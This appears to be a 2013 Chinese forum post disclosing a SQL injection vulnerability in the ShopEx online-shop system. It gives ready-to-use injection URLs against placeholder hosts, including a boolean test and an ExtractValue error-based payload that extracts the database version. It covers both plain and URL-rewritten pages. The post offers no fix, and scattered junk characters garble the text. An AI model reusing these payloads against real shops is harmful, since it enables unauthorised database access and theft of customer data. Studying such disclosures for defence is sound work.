注入漏洞是一种经典的漏洞类型了,自从上次跟基友深聊了注入,我对注入的认识又提升了一个高度,在我看来不可以注入的地方,TMD的竟然可以注入,注入攻击最早出现了1998年,貌似是,记不清了。10多年了,依然存在,虽然比以前出现量少了,但不得不用到的一种攻击技术… 4 a! ]& S0 _1 i- R3 C
' ]9 f4 K$ c, L9 E好吧,我扯远了~~
' m7 B7 f9 C) I4 l4 u8 {7 V其实注入不仅仅出现在动态页面上,难道伪静态后就不能注入了吗?NO~
9 L0 X" h/ F: R' n不扯了,直接说主题吧,shopex网店系统注入漏洞。注入点如下:
9 S2 f5 R& W6 i$ O9 P) \1 @: d5 _
9 o; Y- g' ?5 }' yhttp://www.x.cn/index.php?comment-822′/**/and/**/’1′=’1-ask-commentlist.html
; {, W+ W" z# e- a' e3 C/ l A: [( P/ w
http://www.x.com/comment-8967′/**/and/**/ExtractValue(0×64,concat(0×01,(select/**/@@version)))/**/order/**/by/**/’1-ask-commentlist.html 3 m7 }0 T2 @- M) x; m
0 ^! M1 b/ \. ~
http://www.x.cn/index.php?comment-822′/**/and/**/’1′=’1-ask-commentlist.html
/ O6 w* j4 I! s E; c& [1 R6 }
& R% s+ r6 ^- o4 ^# h/ Zhttp://demo.x.com.cn/485/index.php?comment-190′/**/and/**/’1′=’1-ask-commentlist.html
+ G7 F/ ?) q# I; Y4 m+ S4 t5 L3 c$ f! c$ L
3 R6 U% \& M9 I o% a5 M, @$ j' j
一个是网站未开启伪静态的注入,一个是网站开启伪静态后的注入,以及是否屏蔽错误回显的2X2=4种情况。
% k/ F+ T- F( p如何注入就不多说了,10多年的东西了…不会也会了… 3 ^( T( S# p% g( I1 j8 m
3 Y: n9 { N9 o4 D& A' T" }( O" `, y$ E9 K' R7 k# E" \
# ]0 @7 P3 Y" ?2 J' B* w2 z2 u' \" p6 k
|
发表于 2013-2-19 08:31:27
收藏
支持
反对